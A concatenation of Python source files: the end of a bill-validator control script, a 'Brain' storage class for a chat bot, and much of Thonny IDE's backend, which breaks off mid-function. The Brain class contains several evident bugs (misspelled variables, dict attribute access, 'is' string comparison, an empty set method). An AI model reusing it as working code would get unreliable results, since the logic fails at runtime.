validator.disable_payout()
elif choice == "E": # Empty the storage to the cashbox
validator.empty_storage()
elif choice == "g": # Get the number of bills denominated with their values
choice = input("")
validator.get_note_amount(int(choice))
sleep(1)
print("Number of bills of %s : %s"%(choice, validator.response_data['getnoteamount_response']))
except KeyboardInterrupt: # If user do CTRL+C
validator.close() # Close the connection with the validator
print("Exiting")
exit(0)
|
brain.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import time
import threading
from event_emitter import EventEmitter
from pybot.user import User
class Brain(EventEmitter):
"""
Represents somewhat persistent storage for the robot. Extend this.
Returns a new Brain with no external storage.
"""
def __init__(self, robot):
super(Brain, self).__init__()
self.data = {
'users' : {},
'_private' : {}
}
self.auto_save = True
self.save_interval = None
self.stop_event = threading.Event()
robot.on("running", lambda: self.reset_save_interval(5))
def set(self, key, value):
"""
Public:
Store key-value pair under the private namespace and extend
existing self.data before emitting the 'loaded' event.
Returns the instance for chaining.
"""
## Memo: Check object instance or not ?
pass
def get(self, key):
"""
Public:
Get value by key from the private namespace in self.data
or return null if not found.
Returns the value.
"""
if self.data._private.has_key(key):
return self.data._private[key]
else:
return None
def remove(self, key):
"""
Public:
Remove value by key from the private namespace in self.data
if it exists
Returns the instance for chaining.
"""
if self.data._private.has_key(key):
self.data._private.pop(key)
return self
def save(self):
"""
Public:
Emits the 'save' event so that 'brain' scripts can handle persisting.
Returns nothing.
"""
self.emit('save', self.data)
def close(self):
"""
Public:
Emits the 'close' event so that 'brain' scripts can handle closing.
Returns nothing.
"""
self.clear_interval()
self.save()
self.emit('close')
def set_auto_save(self, enabled):
"""
Public:
Enable or disable the automatic saving
enabled : A boolean whether to autosave or not
Returns nothing.
"""
self.auto_save = enabled
def reset_save_interval(self, seconds):
"""
Public:
Reset the interval between save function calls.
seconds : An Integer of seconds between saves.
Returns nothing.
"""
if self.save_interval:
self.clear_interval()
if self.auto_save:
self.set_interval(self.save, seconds)
def set_interval(self, callback, delay):
def _target():
while not self.stop_event.is_set():
time.sleep(delay)
callback()
self.thread = threading.Thread(target=_target)
self.thread.start()
self.save_interval = True
def clear_interval(self):
self.stop_event.set()
self.thread.join()
self.save_interval = False
def merge_data(self, data):
"""
Public:
Merge keys loaded from a DB against the in memory representation.
Returns nothing.
Caveates:
Deeply nested structures don't merge well.
"""
for key in (data or {}):
self.data[key] = data[key]
self.emit('loaded', self.data)
def users(self):
"""
Public:
Get an Array of User objects stored in the brain.
Returns an Array of User objects.
"""
return self.data.users
def user_for_id(self, id, options):
"""
Public:
Get a User object given a unique identifier.
Returns a User instance of the specified user.
"""
try:
user = self.data['users'][id]
except KeyError:
user = User(id, options)
self.data['users'][id] = user
if (options
and options.has_key('room')
and (not user.room or user.room is not options.has_key('room'))):
user = User(id, options)
self.data['users'][id] = user
return user
def user_for_name(self, name):
"""
Public:
Get a User object given a name.
Returns a User instance for the user with the specified name.
"""
result = None
lower_name = name.lower()
for key in (self.data.users or {}):
user_name = self.data.users[key]['name']
if user_name and str(user_name).lower() is lower_name:
result = self.data.users[key]
return result
def users_for_raw_fuzzy_name(self, fuzzy_name):
"""
Public:
Get all users whose names match fuzzy_name. Currently, match
means 'starts with', but this could be extended to match initials,
nicknames, etc.
Returns an Array of User instances matching the fuzzy name.
"""
lower_fuzzy_name = fuzzy_name.lower()
users = []
for key, user in (self.user or {}):
if (user.name.lower().index(lower_fuzzy_name) == 0
and user.name.lower().count(lower_fuzzy_name)):
users.append(user)
return users
def users_for_fuzzy_name(self, fuzzy_name):
"""
Public:
If fuzzy_name is an exact match for a user, returns an array with
just that user. Otherwise, returns an array of all users for which
fuzzy_name is a raw fuzzy match (see users_for_raw_fuzzy_name)
Returns an Array of User instances matching the fuzzy name.
"""
matchd_users = self.users_for_raw_fuzzy_name(fuzzy_name)
lower_fuzzy_name = fuzzy_name.lower()
for user in matched_users:
if user.name.lower() is lower_fuzzy_name:
return [user]
return matched_users
def extend(self, obj, *sources):
"""
Private:
Extend obj with objects passed as additional args.
Returns the original object with updated changes.
"""
for source in sources:
for key, val in source.items():
ojb[key] = val
return obj
|
backend.py
|
# -*- coding: utf-8 -*-
import ast
import builtins
import copy
import functools
import importlib
import inspect
import io
import logging
import os.path
import pkgutil
import pydoc
import re
import signal
import site
import subprocess
import sys
import tokenize
import traceback
import types
import warnings
from collections import namedtuple
from importlib.machinery import PathFinder, SourceFileLoader
from threading import Thread
import __main__ # @UnresolvedImport
import _ast
import thonny
from thonny.common import (
BackendEvent,
DebuggerCommand,
DebuggerResponse,
FrameInfo,
InlineCommand,
InlineResponse,
InputSubmission,
TextRange,
ToplevelCommand,
ToplevelResponse,
UserError,
ValueInfo,
parse_message,
path_startswith,
range_contains_smaller,
range_contains_smaller_or_equal,
serialize_message,
get_exe_dirs,
get_augmented_system_path,
update_system_path,
is_same_path,
)
import queue
BEFORE_STATEMENT_MARKER = "_thonny_hidden_before_stmt"
BEFORE_EXPRESSION_MARKER = "_thonny_hidden_before_expr"
AFTER_STATEMENT_MARKER = "_thonny_hidden_after_stmt"
AFTER_EXPRESSION_MARKER = "_thonny_hidden_after_expr"
logger = logging.getLogger("thonny.backend")
_CONFIG_FILENAME = os.path.join(thonny.THONNY_USER_DIR, "backend_configuration.ini")
TempFrameInfo = namedtuple(
"TempFrameInfo",
[
"system_frame",
"locals",
"globals",
"event",
"focus",
"node_tags",
"current_statement",
"current_root_expression",
"current_evaluations",
],
)
_vm = None
class VM:
def __init__(self):
global _vm
_vm = self
self._ini = None
self._command_handlers = {}
self._object_info_tweakers = []
self._import_handlers = {}
self._input_queue = queue.Queue()
self._source_preprocessors = []
self._ast_postprocessors = []
self._main_dir = os.path.dirname(sys.modules["thonny"].__file__)
self._heap = {} # WeakValueDictionary would be better, but can't store reference to None
self._source_info_by_frame = {}
site.sethelper() # otherwise help function is not available
pydoc.pager = pydoc.plainpager # otherwise help command plays tricks
self._install_fake_streams()
self._current_executor = None
self._io_level = 0
self._tty_mode = True
self._tcl = None
# clean up path
sys.path = [d for d in sys.path if d != ""]
# start in shell mode
sys.argv[:] = [""] # empty "script name"
sys.path.insert(0, "") # current dir
# clean __main__ global scope
for key in list(__main__.__dict__.keys()):
if not key.startswith("__") or key in {"__file__", "__cached__"}:
del __main__.__dict__[key]
# unset __doc__, then exec dares to write doc of the script there
__main__.__doc__ = None
self._frontend_sys_path = ast.literal_eval(os.environ["THONNY_FRONTEND_SYS_PATH"])
self._load_shared_modules()
self._load_plugins()
self._install_signal_handler()
def mainloop(self):
try:
while True:
try:
cmd = self._fetch_command()
if isinstance(cmd, InputSubmission):
self._input_queue.put(cmd)
elif isinstance(cmd, ToplevelCommand):
self._source_info_by_frame = {}
self._input_queue = queue.Queue()
self.handle_command(cmd)
else:
self.handle_command(cmd)
except KeyboardInterrupt:
logger.exception("Interrupt in mainloop")
# Interrupt must always result in waiting_toplevel_command state
# Don't show error messages, as the interrupted command may have been InlineCommand
# (handlers of ToplevelCommands in normal cases catch the interrupt and provide
# relevant message)
self.send_message(ToplevelResponse())
except Exception:
logger.exception("Crash in mainloop")
traceback.print_exc()
def add_command(self, command_name, handler):
"""Handler should be 1-argument function taking command object.
Handler may return None (in this case no response is sent to frontend)
or a BackendResponse
"""
self._command_handlers[command_name] = handler
def add_object_info_tweaker(self, tweaker):
"""Tweaker should be 2-argument function taking value and export record"""
self._object_info_tweakers.append(tweaker)
def add_import_handler(self, module_name, handler):
if module_name not in self._import_handlers:
self._import_handlers[module_name] = []
self._import_handlers[module_name].append(handler)
def add_source_preprocessor(self, func):
self._source_preprocessors.append(func)
def add_ast_postprocessor(self, func):
self._ast_postprocessors.append(func)
def get_main_module(self):
return __main__
def handle_command(self, cmd):
assert isinstance(cmd, (ToplevelCommand, InlineCommand))
def create_error_response(**kw):
if isinstance(cmd, ToplevelCommand):
return ToplevelResponse(command_name=cmd.name, **kw)
else:
return InlineResponse(command_name=cmd.name, **kw)
if cmd.name in self._command_handlers:
handler = self._command_handlers[cmd.name]
else:
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is None:
response = create_error_response(error="Unknown command: " + cmd.name)
else:
try:
response = handler(cmd)
except SystemExit:
# Must be caused by Thonny or plugins code
if isinstance(cmd, ToplevelCommand):
traceback.print_exc()
response = create_error_response(SystemExit=True)
except UserError as e:
sys.stderr.write(str(e) + "\n")
response = create_error_response()
except KeyboardInterrupt:
response = create_error_response(user_exception=self._prepare_user_exception())
except Exception:
_report_internal_error()
response = create_error_response(context_info="other unhandled exception")
if response is False:
# Command doesn't want to send any response
return
if response is None and isinstance(cmd, ToplevelCommand):
# create simple default response
response = ToplevelResponse(command_name=cmd.name)
# TODO: add these in response creation time in a helper function
if isinstance(response, ToplevelResponse):
response["gui_is_active"] = (
self._get_tcl() is not None or self._get_qt_app() is not None
)
self.send_message(response)
def get_option(self, name, default=None):
section, subname = self._parse_option_name(name)
val = self._get_ini().get(section, subname, fallback=default)
try:
return ast.literal_eval(val)
except Exception:
return val
def set_option(self, name, value):
ini = self._get_ini()
section, subname = self._parse_option_name(name)
if not ini.has_section(section):
ini.add_section(section)
if not isinstance(value, str):
value = repr(value)
ini.set(section, subname, value)
self.save_settings()
def switch_env_to_script_mode(self, cmd):
if "" in sys.path:
sys.path.remove("") # current directory
filename = cmd.args[0]
if os.path.isfile(filename):
sys.path.insert(0, os.path.abspath(os.path.dirname(filename)))
__main__.__dict__["__file__"] = filename
def _parse_option_name(self, name):
if "." in name:
return name.split(".", 1)
else:
return "general", name
def _get_ini(self):
if self._ini is None:
import configparser
self._ini = configparser.ConfigParser(interpolation=None)
self._ini.read(_CONFIG_FILENAME)
return self._ini
def save_settings(self):
if self._ini is None:
return
with open(_CONFIG_FILENAME, "w") as fp:
self._ini.write(fp)
def _custom_import(self, *args, **kw):
module = self._original_import(*args, **kw)
if not hasattr(module, "__name__"):
return module
# module specific handlers
for handler in self._import_handlers.get(module.__name__, []):
try:
handler(module)
except Exception:
_report_internal_error()
# general handlers
for handler in self._import_handlers.get("*", []):
try:
handler(module)
except Exception:
_report_internal_error()
return module
def _load_shared_modules(self):
self.load_modules_with_frontend_path(["parso", "jedi", "thonnycontrib", "six", "asttokens"])
def load_modules_with_frontend_path(self, names):
from importlib import import_module
original_sys_path = sys.path
try:
sys.path = sys.path + self._frontend_sys_path
for name in names:
try:
import_module(name)
except ImportError:
pass
finally:
sys.path = original_sys_path
def _load_plugins(self):
# built-in plugins
import thonny.plugins.backend # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.backend.__path__, "thonny.plugins.backend.")
# 3rd party plugins from namespace package
try:
import thonnycontrib.backend # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.backend.__path__, "thonnycontrib.backend.")
def _load_plugins_from_path(self, path, prefix):
load_function_name = "load_plugin"
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[1]):
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
f = getattr(m, load_function_name)
sig = inspect.signature(f)
if len(sig.parameters) == 0:
f()
else:
f(self)
except Exception:
logger.exception("Failed loading plugin '" + module_name + "'")
def _install_signal_handler(self):
def signal_handler(signal_, frame):
raise KeyboardInterrupt("Execution interrupted")
if os.name == "nt":
signal.signal(signal.SIGBREAK, signal_handler) # @UndefinedVariable
else:
signal.signal(signal.SIGINT, signal_handler)
def _cmd_get_environment_info(self, cmd):
return ToplevelResponse(
main_dir=self._main_dir,
path=sys.path,
usersitepackages=site.getusersitepackages() if site.ENABLE_USER_SITE else None,
prefix=sys.prefix,
welcome_text="Python " + _get_python_version_string(),
executable=sys.executable,
exe_dirs=get_exe_dirs(),
in_venv=(
hasattr(sys, "base_prefix")
and sys.base_prefix != sys.prefix
or hasattr(sys, "real_prefix")
and getattr(sys, "real_prefix") != sys.prefix
),
python_version=_get_python_version_string(),
cwd=os.getcwd(),
)
def _cmd_cd(self, cmd):
if len(cmd.args) == 1:
path = cmd.args[0]
try:
os.chdir(path)
return ToplevelResponse()
except FileNotFoundError:
raise UserError("No such folder: " + path)
except OSError as e:
raise UserError("\n".join(traceback.format_exception_only(type(e), e)))
else:
raise UserError("cd takes one parameter")
def _cmd_Run(self, cmd):
self.switch_env_to_script_mode(cmd)
return self._execute_file(cmd, SimpleRunner)
def _cmd_run(self, cmd):
return self._execute_file(cmd, SimpleRunner)
def _cmd_FastDebug(self, cmd):
self.switch_env_to_script_mode(cmd)
return self._execute_file(cmd, FastTracer)
def _cmd_Debug(self, cmd):
self.switch_env_to_script_mode(cmd)
return self._execute_file(cmd, NiceTracer)
def _cmd_debug(self, cmd):
return self._execute_file(cmd, NiceTracer)
def _cmd_execute_source(self, cmd):
"""Executes Python source entered into shell"""
self._check_update_tty_mode(cmd)
filename = "<pyshell>"
ws_stripped_source = cmd.source.strip()
source = ws_stripped_source.strip("?")
num_stripped_question_marks = len(ws_stripped_source) - len(source)
# let's see if it's single expression or something more complex
try:
root = ast.parse(source, filename=filename, mode="exec")
except SyntaxError as e:
error = "".join(traceback.format_exception_only(type(e), e))
sys.stderr.write(error)
return ToplevelResponse()
assert isinstance(root, ast.Module)
if len(root.body) == 1 and isinstance(root.body[0], ast.Expr):
mode = "eval"
elif len(root.body) > 1 and isinstance(root.body[-1], ast.Expr):
mode = "exec+eval"
else:
mode = "exec"
result_attributes = self._execute_source(
source,
filename,
mode,
NiceTracer if getattr(cmd, "debug_mode", False) else SimpleRunner,
cmd,
)
result_attributes["num_stripped_question_marks"] = num_stripped_question_marks
return ToplevelResponse(command_name="execute_source", **result_attributes)
def _cmd_execute_system_command(self, cmd):
self._check_update_tty_mode(cmd)
env = dict(os.environ).copy()
encoding = "utf-8"
env["PYTHONIOENCODING"] = encoding
# Make sure this python interpreter and its scripts are available
# in PATH
update_system_path(env, get_augmented_system_path(get_exe_dirs()))
popen_kw = dict(
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
env=env,
universal_newlines=True,
)
if sys.version_info >= (3, 6):
popen_kw["errors"] = "replace"
popen_kw["encoding"] = encoding
assert cmd.cmd_line.startswith("!")
cmd_line = cmd.cmd_line[1:]
proc = subprocess.Popen(cmd_line, **popen_kw)
def copy_stream(source, target):
while True:
c = source.readline()
if c == "":
break
else:
target.write(c)
copy_out = Thread(target=lambda: copy_stream(proc.stdout, sys.stdout), daemon=True)
copy_err = Thread(target=lambda: copy_stream(proc.stderr, sys.stderr), daemon=True)
copy_out.start()
copy_err.start()
try:
proc.wait()
except KeyboardInterrupt as e:
print(str(e), file=sys.stderr)
copy_out.join()
copy_err.join()
def _cmd_process_gui_events(self, cmd):
# advance the event loop
try:
# First try Tkinter.
# Need to update even when tkinter._default_root is None
# because otherwise destroyed window will stay up in macOS.
# When switching between closed user Tk window and another window,
# the closed window may reappear in IDLE and CLI REPL
tcl = self._get_tcl()
if tcl is not None and tcl.has_default_root or tcl.updates_without_root < 1:
# http://bugs.python.org/issue989712
# http://bugs.python.org/file6090/run.py.diff
# https://bugs.python.org/review/989712/diff/4528/Lib/idlelib/run.py
tcl.eval("update")
# if not tcl.has_default_root:
# tcl.updates_without_root += 1
else:
# Try Qt only when Tkinter is not used
app = self._get_qt_app()
if app is not None:
app.processEvents()
except Exception:
pass
return False
def _cmd_get_globals(self, cmd):
warnings.warn("_cmd_get_globals is deprecated for CPython")
try:
return InlineResponse(
"get_globals",
module_name=cmd.module_name,
globals=self.export_globals(cmd.module_name),
)
except Exception as e:
return InlineResponse("get_globals", module_name=cmd.module_name, error=str(e))
def _cmd_get_frame_info(self, cmd):
atts = {}
try:
# TODO: make it work also in past states
frame, location = self._lookup_frame_by_id(cmd["frame_id"])
if frame is None:
atts["error"] = "Frame not found"
else:
atts["code_name"] = frame.f_code.co_name
atts["module_name"] = frame.f_globals["__name__"]
atts["locals"] = (
None
if frame.f_locals is frame.f_globals
else self.export_variables(frame.f_locals)
)
atts["globals"] = self.export_variables(frame.f_globals)
atts["freevars"] = frame.f_code.co_freevars
atts["location"] = location
except Exception as e:
atts["error"] = str(e)
return InlineResponse("get_frame_info", frame_id=cmd.frame_id, **atts)
def _cmd_get_active_distributions(self, cmd):
try:
# if it is called after first installation to user site packages
# this dir is not yet in sys.path
if (
site.ENABLE_USER_SITE
and site.getusersitepackages()
and os.path.exists(site.getusersitepackages())
and site.getusersitepackages() not in sys.path
):
# insert before first site packages item
for i, item in enumerate(sys.path):
if "site-packages" in item or "dist-packages" in item:
sys.path.insert(i, site.getusersitepackages())
break
else:
sys.path.append(site.getusersitepackages())
import pkg_resources
pkg_resources._initialize_master_working_set()
dists = {
dist.key: {
"project_name": dist.project_name,
"key": dist.key,
"location": dist.location,
"version": dist.version,
}
for dist in pkg_resources.working_set
} # pylint: disable=not-an-iterable
return InlineResponse(
"get_active_distributions",
distributions=dists,
usersitepackages=site.getusersitepackages() if site.ENABLE_USER_SITE else None,
)
except Exception:
return InlineResponse("get_active_distributions", error=traceback.format_exc())
def _cmd_get_locals(self, cmd):
for frame in inspect.stack():
if id(frame) == cmd.frame_id:
return InlineResponse("get_locals", locals=self.export_variables(frame.f_locals))
raise RuntimeError("Frame '{0}' not found".format(cmd.frame_id))
def _cmd_get_heap(self, cmd):
result = {}
for key in self._heap:
result[key] = self.export_value(self._heap[key])
return InlineResponse("get_heap", heap=result)
def _cmd_shell_autocomplete(self, cmd):
error = None
try:
import jedi
except ImportError:
completions = []
error = "Could not import jedi"
else:
try:
# with warnings.catch_warnings():
interpreter = jedi.Interpreter(cmd.source, [__main__.__dict__])
completions = self._export_completions(interpreter.completions())
except Exception as e:
completions = []
error = "Autocomplete error: " + str(e)
return InlineResponse(
"shell_autocomplete", source=cmd.source, completions=completions, error=error
)
def _cmd_editor_autocomplete(self, cmd):
error = None
try:
import jedi
self._debug(jedi.__file__, sys.path)
with warnings.catch_warnings():
script = jedi.Script(cmd.source, cmd.row, cmd.column, cmd.filename)
completions = self._export_completions(script.completions())
except ImportError:
completions = []
error = "Could not import jedi"
except Exception as e:
completions = []
error = "Autocomplete error: " + str(e)
return InlineResponse(
"editor_autocomplete",
source=cmd.source,
row=cmd.row,
column=cmd.column,
filename=cmd.filename,
completions=completions,
error=error,
)
def _cmd_Reset(self, cmd):
if len(cmd.args) == 0:
# nothing to do, because Reset always happens in fresh process
return ToplevelResponse(
command_name="Reset",
welcome_text="Python " + _get_python_version_string(),
executable=sys.executable,
)
else:
raise UserError("Command 'Reset' doesn't take arguments")
def _export_completions(self, jedi_completions):
result = []
for c in jedi_completions:
if not c.name.startswith("__"):
record = {
"name": c.name,
"complete": c.complete,
"type": c.type,
"description": c.description,
}
""" TODO:
try:
if c.type in ["class", "module", "function"]:
if c.type == "function":
record["docstring"] = c.docstring()
else:
record["docstring"] = c.description + "\n" + c.docstring()
except Exception:
pass
"""
result.append(record)
return result
def _cmd_get_object_info(self, cmd):
if isinstance(self._current_executor, NiceTracer) and self._current_executor.is_in_past():
info = {"id": cmd.object_id, "error": "past info not available"}
elif cmd.object_id in self._heap:
value = self._heap[cmd.object_id]
attributes = {}
if cmd.include_attributes:
for name in dir(value):
if not name.startswith("__") or cmd.all_attributes:
# attributes[name] = inspect.getattr_static(value, name)
try:
attributes[name] = getattr(value, name)
except Exception:
pass
self._heap[id(type(value))] = type(value)
info = {
"id": cmd.object_id,
"repr": repr(value),
"type": str(type(value)),
"full_type_name": str(type(value))
.replace("<class '", "")
.replace("'>", "")
.strip(),
"type_id": id(type(value)),
"attributes": self.export_variables(attributes),
}
if isinstance(value, io.TextIOWrapper):
self._add_file_handler_info(value, info)
elif isinstance(
value,
(
types.BuiltinFunctionType,
types.BuiltinMethodType,
types.FunctionType,
types.LambdaType,
types.MethodType,
),
):
self._add_function_info(value, info)
elif isinstance(value, (list, tuple, set)):
self._add_elements_info(value, info)
elif isinstance(value, dict):
self._add_entries_info(value, info)
elif hasattr(value, "image_data"):
info["image_data"] = value.image_data
for tweaker in self._object_info_tweakers:
try:
tweaker(value, info, cmd)
except Exception:
logger.exception("Failed object info tweaker: " + str(tweaker))
else:
info = {"id": cmd.object_id, "error": "object info not available"}
return InlineResponse("get_object_info", id=cmd.object_id, info=info)
def _get_tcl(self):
if self._tcl is not None:
return self._tcl
tkinter = sys.modules.get("tkinter")
if tkinter is None:
return None
if self._tcl is None:
try:
self._tcl = tkinter.Tcl()
self._tcl.updates_without_root = 0
except Exception:
pass
self._tcl.has_default_root = tkinter._default_root is not None
return self._tcl
def _get_qt_app(self):
mod = sys.modules.get("PyQt5.QtCore")
if mod is None:
mod = sys.modules.get("PyQt4.QtCore")
if mod is None:
mod = sys.modules.get("PySide.QtCore")
if mod is None:
return None
app_class = getattr(mod, "QCoreApplication", None)
if app_class is not None:
try:
return app_class.instance()
except Exception:
return None
else:
return None
def _add_file_handler_info(self, value, info):
try:
assert isinstance(value.name, str)
assert value.mode in ("r", "rt", "tr", "br", "rb")
assert value.errors in ("strict", None)
assert value.newlines is None or value.tell() > 0
# TODO: cache the content
# TODO: don't read too big files
with open(value.name, encoding=value.encoding) as f:
info["file_encoding"] = f.encoding
info["file_content"] = f.read()
info["file_tell"] = value.tell()
except Exception as e:
info["file_error"] = "Could not get file content, error:" + str(e)
def _add_function_info(self, value, info):
try:
info["source"] = inspect.getsource(value)
except Exception:
pass
def _add_elements_info(self, value, info):
info["elements"] = []
for element in value:
info["elements"].append(self.export_value(element))
def _add_entries_info(self, value, info):
info["entries"] = []
for key in value:
info["entries"].append((self.export_value(key), self.export_value(value[key])))
def _execute_file(self, cmd, executor_class):
self._check_update_tty_mode(cmd)
if len(cmd.args) >= 1:
sys.argv = cmd.args
filename = cmd.args[0]
if os.path.isabs(filename):
full_filename = filename
else:
full_filename = os.path.abspath(filename)
with tokenize.open(full_filename) as fp:
source = fp.read()
for preproc in self._source_preprocessors:
source = preproc(source, cmd)
result_attributes = self._execute_source(
source, full_filename, "exec", executor_class, cmd, self._ast_postprocessors
)
result_attributes["filename"] = full_filename
return ToplevelResponse(command_name=cmd.name, **result_attributes)
else:
raise UserError("Command '%s' takes at least one argument" % cmd.name)
def _execute_source(
self, source, filename, execution_mode, executor_class, cmd, ast_postprocessors=[]
):
self._current_executor = executor_class(self, cmd)
try:
return self._current_executor.execute_source(
source, filename, execution_mode, ast_postprocessors
)
finally:
self._current_executor = None
def _install_fake_streams(self):
self._original_stdin = sys.stdin
self._original_stdout = sys.stdout
self._original_stderr = sys.stderr
# yes, both out and err will be directed to out (but with different tags)
# this allows client to see the order of interleaving writes to stdout/stderr
sys.stdin = VM.FakeInputStream(self, sys.stdin)
sys.stdout = VM.FakeOutputStream(self, sys.stdout, "stdout")
sys.stderr = VM.FakeOutputStream(self, sys.stdout, "stderr")
# fake it properly: replace also "backup" streams
sys.__stdin__ = sys.stdin
sys.__stdout__ = sys.stdout
sys.__stderr__ = sys.stderr
def _install_custom_import(self):
self._original_import = builtins.__import__
builtins.__import__ = self._custom_import
def _restore_original_import(self):
builtins.__import__ = self._original_import
def _fetch_command(self):
line = self._original_stdin.readline()
if line == "":
logger.info("Read stdin EOF")
sys.exit()
cmd = parse_message(line)
return cmd
def send_message(self, msg):
if "cwd" not in msg:
msg["cwd"] = os.getcwd()
if isinstance(msg, ToplevelResponse) and "globals" not in msg:
msg["globals"] = self.export_globals()
self._original_stdout.write(serialize_message(msg) + "\n")
self._original_stdout.flush()
def export_value(self, value, max_repr_length=5000):
self._heap[id(value)] = value
try:
rep = repr(value)
except Exception:
# See https://bitbucket.org/plas/thonny/issues/584/problem-with-thonnys-back-end-obj-no
rep = "??? <repr error>"
if len(rep) > max_repr_length:
rep = rep[:max_repr_length] + "…"
return ValueInfo(id(value), rep)
def export_variables(self, variables):
result = {}
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for name in variables:
if not name.startswith("__"):
result[name] = self.export_value(variables[name], 100)
return result
def export_globals(self, module_name="__main__"):
if module_name in sys.modules:
return self.export_variables(sys.modules[module_name].__dict__)
else:
raise RuntimeError("Module '{0}' is not loaded".format(module_name))
def _debug(self, *args):
logger.debug("VM: " + str(args))
def _enter_io_function(self):
self._io_level += 1
def _exit_io_function(self):
self._io_level -= 1
def is_doing_io(self):
return self._io_level > 0
def _export_stack(self, newest_frame, relevance_checker=None):
result = []
system_frame = newest_frame
while system_frame is not None:
module_name = system_frame.f_globals["__name__"]
code_name = system_frame.f_code.co_name
if not relevance_checker or relevance_checker(system_frame):
source, firstlineno, in_library = self._get_frame_source_info(system_frame)
result.insert(
0,
FrameInfo(
# TODO: can this id be reused by a later frame?
# Need to store the refernce to avoid GC?
# I guess it is not required, as id will be required
# only for stacktrace inspection, and sys.last_exception
# will have the reference anyway
# (NiceTracer has its own reference keeping)
id=id(system_frame),
filename=system_frame.f_code.co_filename,
module_name=module_name,
code_name=code_name,
locals=self.export_variables(system_frame.f_locals),
globals=self.export_variables(system_frame.f_globals),
freevars=system_frame.f_code.co_freevars,
source=source,
lineno=system_frame.f_lineno,
firstlineno=firstlineno,
in_library=in_library,
event="line",
focus=TextRange(system_frame.f_lineno, 0, system_frame.f_lineno + 1, 0),
node_tags=None,
current_statement=None,
current_evaluations=None,
current_root_expression=None,
),
)
if module_name == "__main__" and code_name == "<module>":
# this was last frame relevant to the user
break
system_frame = system_frame.f_back
assert result # not empty
return result
def _lookup_frame_by_id(self, frame_id):
def lookup_from_stack(frame):
if frame is None:
return None
elif id(frame) == frame_id:
return frame
else:
return lookup_from_stack(frame.f_back)
def lookup_from_tb(entry):
if entry is None:
return None
elif id(entry.tb_frame) == frame_id:
return entry.tb_frame
else:
return lookup_from_tb(entry.tb_next)
result = lookup_from_stack(inspect.currentframe())
if result is not None:
return result, "stack"
if getattr(sys, "last_traceback"):
result = lookup_from_tb(getattr(sys, "last_traceback"))
if result:
return result, "last_traceback"
_, _, tb = sys.exc_info()
return lookup_from_tb(tb), "current_exception"
def _get_frame_source_info(self, frame):
fid = id(frame)
if fid not in self._source_info_by_frame:
self._source_info_by_frame[fid] = _fetch_frame_source_info(frame)
return self._source_info_by_frame[fid]
def _prepare_user_exception(self):
e_type, e_value, e_traceback = sys.exc_info()
sys.last_type, sys.last_value, sys.last_traceback = (e_type, e_value, e_traceback)
processed_tb = traceback.extract_tb(e_traceback)
tb = e_traceback
while tb.tb_next is not None:
tb = tb.tb_next
last_frame = tb.tb_frame
if e_type is SyntaxError:
# Don't show ast frame
while last_frame.f_code.co_filename and last_frame.f_code.co_filename == ast.__file__:
last_frame = last_frame.f_back
if e_type is SyntaxError:
msg = (
traceback.format_exception_only(e_type, e_value)[-1]
.replace(e_type.__name__ + ":", "")
.strip()
)
else:
msg = str(e_value)
return {
"type_name": e_type.__name__,
"message": msg,
"stack": self._export_stack(last_frame),
"items": format_exception_with_frame_info(e_type, e_value, e_traceback),
"filename": getattr(e_value, "filename", processed_tb[-1].filename),
"lineno": getattr(e_value, "lineno", processed_tb[-1].lineno),
"col_offset": getattr(e_value, "offset", None),
"line": getattr(e_value, "text", processed_tb[-1].line),
}
def _check_update_tty_mode(self, cmd):
if "tty_mode" in cmd:
self._tty_mode = cmd["tty_mode"]
class FakeStream:
def __init__(self, vm, target_stream):
self._vm = vm
self._target_stream = target_stream
self._processed_symbol_count = 0
def isatty(self):
return self._vm._tty_mode and (os.name != "nt" or "click" not in sys.modules)
def __getattr__(self, name):
# TODO: is it safe to perform those other functions without notifying vm
# via _enter_io_function?
return getattr(self._target_stream, name)
class FakeOutputStream(FakeStream):
def __init__(self, vm, target_stream, stream_name):
VM.FakeStream.__init__(self, vm, target_stream)
self._stream_name = stream_name
def write(self, data):
try:
self._vm._enter_io_function()
# click may send bytes instead of strings
if isinstance(data, bytes):
data = data.decode(errors="replace")
if data != "":
self._vm.send_message(
BackendEvent("ProgramOutput", stream_name=self._stream_name, data=data)
)
self._processed_symbol_count += len(data)
finally:
self._vm._exit_io_function()
def writelines(self, lines):
try:
self._vm._enter_io_function()
self.write("".join(lines))
finally:
self._vm._exit_io_function()
class FakeInputStream(FakeStream):
def _generic_read(self, method, limit=-1):
# is there some queued input?
if not self._vm._input_queue.empty():
cmd = self._vm._input_queue.get()
self._processed_symbol_count += len(cmd.data)
return cmd.data
# new input needs to be requested
try:
self._vm._enter_io_function()
self._vm.send_message(BackendEvent("InputRequest", method=method, limit=limit))
while True:
cmd = self._vm._fetch_command()
if isinstance(cmd, InputSubmission):
self._processed_symbol_count += len(cmd.data)
return cmd.data
elif isinstance(cmd, InlineCommand):
self._vm.handle_command(cmd)
else:
raise RuntimeError("Wrong type of command when waiting for input")
finally:
self._vm._exit_io_function()
def read(self, limit=-1):
return self._generic_read("read", limit)
def readline(self, limit=-1):
return self._generic_read("readline", limit)
def readlines(self, limit=-1):
return self._generic_read("readlines", limit)
def __next__(self):
return self.readline()
def __iter__(self):
return self
def prepare_hooks(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
try:
sys.meta_path.insert(0, self)
self._vm._install_custom_import()
return method(self, *args, **kwargs)
finally:
del sys.meta_path[0]
if hasattr(self._vm, "_original_import"):
self._vm._restore_original_import()
return wrapper
def return_execution_result(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
try:
result = method(self, *args, **kwargs)
if result is not None:
return result
return {"context_info": "after normal execution"}
except Exception:
return {"user_exception": self._vm._prepare_user_exception()}
return wrapper
class Executor:
def __init__(self, vm, original_cmd):
self._vm = vm
self._original_cmd = original_cmd
self._main_module_path = None
def execute_source(self, source, filename, mode, ast_postprocessors):
if isinstance(source, str):
# TODO: simplify this or make sure encoding is correct
source = source.encode("utf-8")
if os.path.exists(filename):
self._main_module_path = filename
global_vars = __main__.__dict__
statements = expression = None
try:
if mode == "exec+eval":
assert not ast_postprocessors
